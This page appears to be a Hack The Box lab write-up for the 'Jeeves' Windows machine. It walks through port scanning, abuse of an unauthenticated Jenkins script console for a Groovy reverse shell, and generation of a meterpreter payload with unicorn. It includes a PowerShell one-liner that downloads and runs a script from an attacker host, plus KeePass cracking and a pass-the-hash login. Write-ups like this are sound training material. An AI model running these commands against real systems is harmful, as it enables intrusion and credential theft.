Hacking
Github
Twitter
Search…
Hacking
Hacking, Bug Bounties & Penetration Testing
The Hacker Lab
Methodologies
Basic Buffer Overflow
Basic Internal Network test
Basic Mobile Testing guide
Basic Subdomain Enumeration guide
Guides
Build A Raspberry Pi Dropbox
Golang
Powershell / PowerView
Hack The Box last updated - 2019
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered By
GitBook
Jeeves
Jeeves - 10.10.10.63
Target Enumeration:
OS: Windows
IP: 10.10.10.63
User Hash: e3232272596fb47950d59c4cf1e7066a
Root Hash: afbc5bd4b615a60648cec41c6ac92530
Ports / Services / Software Versions Running
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Vulnerability Exploited:
Jenkins /script enabled unauthenticated on port 50000
Privilege Escalation
Administrator hash stored in keepass file with weak password.
Replicating the exploit:
Nmap TCP
Nmap UDP:
Nikto:
Port 80
Port 50000
Dirb:
Port 80
Port 50000 brings back nothing.
Dirbuster
Nothing found on port 50000.
/askjeeves on port 50000
Enum4linux brought back nothing
Browsed to port 80 and it is a search bar which always gives you this:
Source code:
Response from initial web page.
Downloaded image and ran image though strings and binwalk which brought back nothing.
This is an image not a verbose error message which suggests it could be a troll.
Downloaded the main image and checked it to see if it had anything in it with strings.
Browsed to port 50000 and you get this:
Potential software version: Jetty:// 9.4.z-SNAPSHOT
​
https://www.exploit-db.com/exploits/36318/
​
dotdotpwn -m http -o windows -x 50000 -h 10.10.10.63
Also tried
​
https://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
​
Not vulnerable
Come back to this.
Finally found some dirs
Dirbuster
Searchsploit brought back:
Metasploit brought back
None of them worked.
Found a way to execute commands via groovy script on webserver:
Found rvshell.groovy
​
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
​
Download to system with github and modify
Paste into the scriptconsole
Execute with 443 listening.
Use the following code to download files to the system
Convert to a meterpreter shell
1
git clone https://github.com/trustedsec/unicorn.git
2
cd unicorn
3
python unicorn.py windows/meterpreter/reverse_tcp 192.168.0.1 443
4
python -m SimpleHTTPServer 80
Copied!
In new tab
1
mv powershell_attack.txt Shell.ps1
2
msfconsole -r unicorn.rc
Copied!
On victim machine from a command prompt.
1
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.8/Shell.ps1')"
Copied!
Run local exploit suggester against the host
Drop into a shell and download tools
PowerUp.ps1
Service found
No exploits worked so far so start digging around the system
We found the following credentials in credentials.xml in the jenkins dir.
These are encrypted so run the following via the /script dir on the webserver and you get the password admin:
Search for other passwords
This once cracked gives you admin:admin which is of no use for privesc.
Digging around the file system we find a keepass file called CEH
Download the file locally and decrypt the password
Install kpcli
apt-get install kpcli libterm-readline-gnu-perl libdata-password-perl
Inspect all of the entries
Looks like a ntlm hash
Use passthehash to login to the system
Upload a windows shell via our low priv account and execute via pth-winexe
Interact with the meterpreter shell
Grab your flags:
View the data stream to read the root flag:
Hack The Box last updated - 2019 - Previous
Sense
Next - Hack The Box last updated - 2019
Stratosphere
Last modified
3yr ago
Copy link
Contents
Jeeves - 10.10.10.63
Target Enumeration:
Ports / Services / Software Versions Running
Vulnerability Exploited:
Privilege Escalation
Replicating the exploit: